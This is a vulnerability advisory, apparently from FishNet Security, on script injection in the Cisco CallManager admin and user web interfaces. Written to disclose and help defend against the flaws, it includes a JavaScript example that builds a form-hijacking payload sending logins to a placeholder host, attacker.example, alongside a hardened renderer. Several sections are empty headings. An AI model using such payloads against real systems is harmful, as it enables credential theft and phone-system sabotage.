Input Validation/Output Encoding Vulnerabilities in Cisco CallManager Allow Script Injection Attacks

General Information

Company Background

Founded in 1996, FishNet Security has become one of the country's leading and most respected innovators in the network security industry. FishNet Security is focused exclusively on network security. Our roots are grounded in the engineering and technical aspects of network security as opposed to consulting firms that have ventured resources into the network security arena. Our business foundations offer strength and stability that set us apart from the "dot-com" model.

Commitment to our Customers

Headquartered in Kansas City, Missouri, FishNet Security is committed to being the largest network security company in the Midwest. In order to provide superior customer service, FishNet Security has regional offices in St. Louis, Dallas, Minneapolis, Boston, Denver, Omaha, New York City, Los Angeles, Phoenix, San Diego, Seattle, Livermore, Sacramento, Raleigh, Park City, Philadelphia, and Bangalore, India. Our management team works to ensure a high level of service through frequent and direct contact with our customers.

Engineering Expertise

FishNet Security offers a technical staff with experience, training and industry certifications such as Check Point Certified Security Expert, Cisco Certified Internetwork Engineer (CCIE), Certified Information System Security Professional, Microsoft Certified System Engineer and more. Our engineers are certified in industry leading security product lines, and in the networking, operating system and routing foundations that underscore successful implementations.

Corporate Profile

FishNet Security Vulnerability Research Team

The FishNet Security Vulnerability Research Team comprises highly technical employees and is designed to be flexible to meet the varying needs of FishNet and our clients. The following individuals participated in the vulnerability research on this project:

Jake Reynolds, Senior Security Engineer
Initial vulnerability discovery, exploit development, and threat analysis
Office: +1 (816) 421.6611
Cell: +1 (913) 710.1986
Email: jake.reynolds@fishnetsecurity.com
Arian Evans, Senior Security Engineer
Threat analysis
Office: +1 (816) 421.6611
Cell: +1 (913) 710.7085
Email: arian.evans@fishnetsecurity.com

Executive Summary

Vulnerability Overview:

The web interfaces used to administer Cisco CallManager software lack input validation and output encoding. As a result, an attacker can craft a request that causes the CallManager web interface to include malicious JavaScript in its response. If a victim can be made to submit this specially crafted request, the victim's browser renders the response and executes the injected JavaScript in the origin of the CallManager web interface, with whatever access the victim holds there.

Attack Overview:

If such a request is delivered to CallManager administrators (for example as a link in an email, or embedded in an HTML page that issues it automatically via a redirect) an attacker can perform a variety of nefarious actions. Depending on the scripted payload, these attacks are commonly referred to as cross-site scripting (XSS) and cross-site request forgery (CSRF, also known as session riding). Potential threats that can be realized through these vulnerabilities could include but are not limited to:

Technical Detail

Vulnerability Details:

The web interfaces used to administer Cisco CallManager exhibit input validation/output encoding vulnerabilities throughout the applications. Specifically, the "Cisco CallManager Administration" and "Cisco CallManager User Options" interfaces contain multiple instances of these vulnerabilities. This advisory focuses on a subset of those vulnerabilities that can be exploited by an attacker who holds no credentials for the application. Not all vulnerability instances are included.

The Cisco CallManager Administration (http://CallManagerAddress/ccmadmin/) web interface contains parameters whose user-supplied values are echoed in subsequent responses without being properly encoded. Although this interface requires HTTP basic authentication before the vulnerable parameters can be reached, the browser re-sends the original request, now carrying the Authorization header, once the user has entered credentials. Reflected script injection is therefore possible if the attacker can lure a CallManager administrator into entering their credentials when the basic authentication prompt appears; the injected script then runs with the administrator's cached credentials attached to every request it makes to the same origin. The URL below takes advantage of the vulnerable "pattern" parameter, whose value is returned unencoded at several points within the subsequent responses.

A simple proof-of-concept script has been written that uses XMLHTTP, from within the injected script and riding on the administrator's authenticated session, to search for devices and delete them from the CallManager configuration. Prior knowledge of the CallManager configuration would allow more targeted attacks that intelligently reconfigure the phone system.

The Cisco CallManager User Options (http://CallManagerAddress/ccmuser/) web interface also contains vulnerable parameters. Most notably, arbitrary parameters included in requests to /ccmuser/logon.asp are returned by the application without proper input validation or output encoding, even when the page has no use for them. The URL below takes advantage of this behavior by appending the parameter "MadeUpParameter" with a value that closes the form element the reflected value lands in, then rewrites every form action on the page to point to an attacker site that collects all submitted input. The '+' characters of the loop's post-increment cannot be sent literally: the query-string parser decodes a bare '+' as a space (the standard form-urlencoding rule), which is why the application appears to strip them, so the URL hex encoding %2B is used instead.

By luring phone system users into making the above request and logging in, an attacker can steal their credentials.
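The reflection described above for /ccmuser/logon.asp, and the missing output encoding that underlies both it and the /ccmadmin/ "pattern" case, as an added example that is not part of this advisory and is not Cisco's code: a JavaScript (Node.js) model of a logon page that echoes arbitrary query parameters into its form unencoded, the hardened form beside it, and the '+' decoding pitfall noted above. The form layout, the returnUrl allow-list and the attacker.example host are assumptions made for illustration only.

```javascript
'use strict';

// Minimal HTML encoder for text and double-quoted attribute contexts.
function htmlEncode(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable model of the logon page: every query-string parameter is echoed
// into a hidden input of the logon form with no encoding and no allow-list.
// Modelled on the behaviour the advisory describes; it is not Cisco's code.
function renderLogonVulnerable(queryString) {
  let hidden = '';
  for (const [name, value] of new URLSearchParams(queryString)) {
    hidden += `<input type="hidden" name="${name}" value="${value}">\n`;
  }
  return `<form action="/ccmuser/logon.asp" method="post">\n${hidden}` +
    '<input name="userid"><input name="password" type="password">\n</form>';
}

// Hardened model: only parameters the page actually needs are reflected
// (a hypothetical allow-list), and each is HTML-encoded for its context.
const REFLECTED_PARAMS = new Set(['returnUrl']);

function renderLogonHardened(queryString) {
  let hidden = '';
  for (const [name, value] of new URLSearchParams(queryString)) {
    if (!REFLECTED_PARAMS.has(name)) continue; // unexpected parameters are dropped
    hidden += `<input type="hidden" name="${htmlEncode(name)}" ` +
      `value="${htmlEncode(value)}">\n`;
  }
  return `<form action="/ccmuser/logon.asp" method="post">\n${hidden}` +
    '<input name="userid"><input name="password" type="password">\n</form>';
}

// Constructed payload in the shape the advisory describes: close the value
// attribute and the input tag, then point every form action at a collection
// site. attacker.example is a placeholder host, not a real one.
const PAYLOAD =
  '"><script>for(var i=0;i<document.forms.length;i++)' +
  'document.forms[i].action="http://attacker.example/collect";</script>';

// Build the query string for the attack URL. encodeURIComponent writes the
// two '+' characters of the post-increment as %2B; a literal '+' in a query
// string would be decoded as a space by any form-urlencoding parser.
function buildAttackQuery(payload) {
  return 'MadeUpParameter=' + encodeURIComponent(payload);
}

// What the server-side parser sees for a parameter after decoding.
function decodeQueryValue(queryString, name) {
  return new URLSearchParams(queryString).get(name);
}

// Crude check used by the tests: did a real <script ...> tag reach the markup?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}
```

The hardened page fails closed on two counts: it drops parameters it has no reason to reflect, and it encodes the ones it does reflect for the attribute context, so the payload's closing quote and script tag arrive as inert text. Encoding is context-specific; a value that lands inside an existing script block or a URL attribute needs a different encoder than the one shown here.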

Mitigating Factors

Prerequisites

In all cases, there is some prerequisite information that an attacker must have. The address of the CallManager is obviously needed in order to craft malicious requests correctly. Internally, it could easily be gained by viewing the network configuration on the IP phones that register with the targeted CallManager, unless the display of this information has been disabled. Social engineering could allow an attacker to gain this information from inside or outside the organization. It is important to note that while the address of the target CallManager is required, the attacker does not require network connectivity to it. Reflected script injection attacks only require that the victim has connectivity to the vulnerable application, since the victim is the entity that makes the malicious request, causing the script included in the vulnerable server's response to execute in the victim's browser.

Any intelligent reconfiguration of Cisco CallManager using CSRF attacks as mentioned above would require knowledge of the current CallManager configuration. However, a significant amount of damage could be inflicted by an XMLHTTP-based script that searches for and deletes all devices without prior knowledge of the current CallManager configuration.

Exploitation of the "Cisco CallManager User Options" logon page likewise does not require the attacker to have connectivity to the target CallManager. However, using stolen credentials gained through such an attack would require connectivity to a system that accepts them. In many cases that system is only the CallManager itself. Where CallManager is integrated with another directory such as iPlanet or Active Directory, however, credential theft could lead to an attacker gaining access to many other services.

Recommended Actions

Technical Workarounds

Non-Technical Workarounds

Contact

You can reach the author of this advisory by emailing jake.reynolds@fishnetsecurity.com. Media professionals, please contact Jon Forbis at (888) 732.9406 or by email at jon.forbis@fishnetsecurity.com.

You can view Cisco's official response to this advisory here.